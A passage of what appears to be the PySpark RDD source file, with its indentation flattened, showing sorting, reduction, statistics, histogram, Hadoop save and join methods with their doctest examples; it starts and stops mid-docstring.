Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
@ignore_unicode_prefix
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip(b'\n').decode('utf-8') for x in iter(pipe.stdout.readline, b''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative and commutative function and
a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element(where n = # buckets).
Buckets must be sorted and not contain any duplicates, must be
at least two elements.
If `buckets` is a number, it will generates buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1 If the RDD contains infinity, NaN throws an exception
If the elements in RDD do not vary (max == min) always returns
a single bucket.
It will return an tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
